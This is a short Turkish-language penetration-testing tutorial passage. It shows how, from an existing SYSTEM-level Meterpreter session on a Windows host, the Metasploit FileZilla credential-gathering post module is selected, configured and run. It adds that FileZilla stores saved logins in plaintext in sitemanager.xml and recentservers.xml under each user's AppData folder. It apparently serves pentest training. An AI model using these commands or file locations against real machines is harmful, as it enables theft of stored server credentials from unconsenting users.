W7 adlı bir bilgisayarda SYSTEM hakları ile Meterpreter bağlantısının elde edildiği görülmektedir. MSF filezilla_client_cred post modülü ile Filezilla uygulamasının içerisinde kayıtlı olan erişim bilgilerinin elde edilmesi için modül seçilir ve seçenekleri incelenir.
sessions
search filezilla type:post
use post/multi/gather/filezilla_client_cred
show options
Modüle oturum ID değeri verilerek modül çalışıtırılır ve Filezilla uygulamasında kayıtlı olan kimlik bilgileri ele geçirilir.
set SESSION 1
show options
run
İpucu: Her bir kullanıcının “C:\Users\<KullaniciAdi>\Appdata\Roaming\Filezilla” dizini altındaki “sitemanager.xml” (ve “recentservers.xml”) dosyaları içerisinde erişim bilgileri açık halde bulunur. Bu dosyalar herhangi bir metin editörü ile açılarak da Filezilla uygulamasındaki erişim bilgileri elde edilebilir.